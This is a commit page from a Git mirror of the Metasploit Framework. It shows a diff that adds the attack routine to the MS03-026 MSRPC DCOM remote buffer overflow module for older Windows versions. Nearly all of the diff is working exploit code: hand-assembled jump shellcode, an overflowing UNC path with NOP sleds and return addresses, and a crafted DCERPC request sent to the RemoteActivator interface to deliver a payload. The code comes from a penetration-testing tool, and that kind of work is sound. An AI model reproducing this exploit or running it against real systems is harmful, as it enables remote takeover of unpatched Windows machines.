infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

This might actually work 

git-svn-id: file:///home/svn/incoming/trunk@2787 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-07-18 01:47:28 +00:00
parent fcf0a8390d
commit 649a5038d8
1 changed files with 165 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

166
modules/exploits/windows/msrpc_dcom_ms03_026.rb
View File

@ -32,6 +32,7 @@ class Exploits::Windows::MSRPC_DCOM_MS03_026 < Msf::Exploit::Remote
'Payload' =>
{
'Space' => 880,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
},
'Targets' =>
@ -56,8 +57,171 @@ class Exploits::Windows::MSRPC_DCOM_MS03_026 < Msf::Exploit::Remote
],
'DefaultTarget' => 0))
end
def exploit
connect
# Carefully create the combination of addresses and code for cross-os exploitation
xpseh = Rex::Text.rand_text_alphanumeric(360, payload_badchars)
# Jump to [esp-4] - (distance to shellcode)
jmpsc =
"\x8b\x44\x24\xfc" + # mov eax,[esp-0x4]
"\x05\xe0\xfa\xff\xff" + # add eax,0xfffffae0 (sub eax, 1312)
"\xff\xe0" # jmp eax
# Jump to [ebp+0x30] - (distance to shellcode) - thanks again Litchfield!
jmpsc2k3 =
"\x8b\x45\x30" + # mov eax,[ebp+0x30]
"\x05\x24\xfb\xff\xff" + # add eax,0xfffffb24 (sub 1244)
"\xff\xe0" # jmp eax
# Windows 2003 added by spoonm
xpseh[ 246 - jmpsc2k3.length, jmpsc2k3.length ] = jmpsc2k3
# substr($xpseh, 246 - length($jmpsc2k3), length($jmpsc2k3), $jmpsc2k3);
xpseh[ 246, 2 ] = Rex::Arch::X86.jmp_short(jmpsc2k3.length * -1)
# substr($xpseh, 246, 2, Pex::x86::JmpShort('$+' . (-1 * length($jmpsc2k3))));
xpseh[ 250, 4 ] = [ target['Rets'][4] ].pack('V')
# substr($xpseh, 250, 4, pack('V', $target->[5]));
xpseh[ 306, 2 ] = "\xeb\x06"
# substr($xpseh, 306, 2, "\xeb\x06");
xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V')
# substr($xpseh, 310, 4, pack('V', $target->[4]));
xpseh[ 314, jmpsc.length ] = jmpsc
# substr($xpseh, 314, length($jmpsc), $jmpsc);
#
# NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
# NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
# HD wrote NT 4.0 SP6a, and it's off in a different place
#
# Our NT 4.0 SP3/SP4/SP5 overwrites will look something like this:
# (hopefully I'm accurate, this is from my memory...)
#
# |---pop pop ret-------- --eax---|
# V | | V
# [ jmp +17 ] [ ret sp3/4 ] [ ret sp5 ] [ jmpback sp5 ] [ jmpback sp3/4 ]
# 4 4 4 5 5
# | ^
# --------------------------------------------------|
# The jmpback's all are 5 byte backwards jumps into our shellcode that
# sits just below these overwrites...
#
nt4sp3jmp = Rex::Arch::X86.jmp_short(12 + 15) +
Rex::Text.rand_text(2, payload_badchars)
# my $nt4sp3jmp =
# Pex::x86::JmpShort('$+' . (12 + 5)) .
# Pex::Text::RandomChars(2, $self->PayloadBadChars);
nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
#my $nt4sp5jmpback = "\xe9" . pack('V', -(5 + 4 + length($shellcode)));
nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
#my $nt4sp3jmpback = "\xe9" . pack('V', -(12 + 5 + 5 + length($shellcode)));
ntshiz = nt4sp3jmp +
[ target['Rets'][6] ].pack('V') +
[ target['Rets'][5] ].pack('V') +
nt4sp5jmpback +
nt4sp3jmpback
#my $ntshiz =
# $nt4sp3jmp . pack('V', $target->[7]) .
# pack('V', $target->[6]) . $nt4sp5jmpback . $nt4sp3jmpback;
# Pad to the magic value of 118 bytes
ntshiz += Rex::Text.rand_text(118 - ntshiz.length, payload_badchars)
# $ntshiz .= Pex::Text::RandomChars(118 - length($ntshiz), $self->PayloadBadChars);
# Create the evil UNC path used in the overflow
uncpath =
"\x90" * 32 +
"\xeb\x10\xeb\x19" + # When attacking NT 4.0, jump over 2000/XP return
[ target['Rets'][2] ].pack('V') + # Return address for 2000 (ebx)
[ target['Rets'][0] ].pack('V') + # Return address for NT 4.0 SP6 (esi)
[ target['Rets'][1] ].pack('V') + # Writable address on 2000 and jmp for NT 4.0
"\x90" * 88 +
"\xeb\x04\xff\xff\xff\xff" +
"\x90" * 8 +
"\xeb\x04\xeb\x04" +
"\x90" * 4 +
"\xeb\x04\xff\xff\xff\xff" +
payload.encoded +
ntshiz +
xpseh +
"\x5c\x00\x41\x00\x00\x00\x00\x00\x00\x00"
#my $uncpath =
# $self->MakeNops(32).
# "\xeb\x10\xeb\x19". # When attacking NT 4.0, jump over 2000/XP return
# pack("V", $target->[3]). # Return address for 2000 (ebx)
# pack("V", $target->[1]). # Return address for NT 4.0 (esi)
# pack("V", $target->[2]). # Writable address on 2000 and jmp for NT 4.0
# $self->MakeNops(88).
# "\xeb\x04\xff\xff\xff\xff".
# $self->MakeNops(8).
# "\xeb\x04\xeb\x04".
# $self->MakeNops(4).
# "\xeb\x04\xff\xff\xff\xff".
# $shellcode . $ntshiz . $xpseh.
# "\x5c\x00\x41\x00\x00\x00\x00\x00\x00\x00";
# This is the rpc cruft needed to trigger the vuln API
stubdata =
"\x05\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x58\x7d\x75\x75" +
"\x40\xeb\xc6\x47\xbc\x71\x4e\xa7\x1c\xd0\xb5\x97\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x09\x00\x20\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00" +
"\x5c\x00\x5c\x00" +
uncpath +
"\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" +
"\x68\x1c\x09\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\xc0\x00\x00\x00\x00\x00\x00\x46\x01\x00\x00\x00\x01\x00\x00\x00" +
"\x07\x00"
# Pad, calculate, set number of wide chars in path
pathsz = (((uncpath.length + 11) & ~7) / 2)
# my $pathsz = ((length($uncpath) + 11) & ~7) / 2;
stubdata[ 52, 4 ] = [ pathsz ].pack('V')
# substr($stubdata, 52, 4, pack("V", $pathsz));
stubdata[ 60, 4 ] = [ pathsz ].pack('V')
#substr($stubdata, 60, 4, pack("V", $pathsz));
d = Rex::Proto::DCERPC.new()
u = Rex::Proto::DCERPC::UUID.new()
uuid = u.uuid_by_name('REMACT')
vers = u.vers_by_name('REMACT')
bind_pkt, ctx = d.make_bind_fake_multi(uuid, vers, 10, 4)
sock.put(bind_pkt)
resp = d.read_response(sock)
if (resp.ack_result[ctx] != 0)
puts "bind failed"
return
end
puts "bind successful to RemoteActivator"
d.make_request(0, stubdata, 256, ctx).each do |chunk|
sock.put(chunk)
end
resp = d.read_response(sock)
p resp
handler
end
end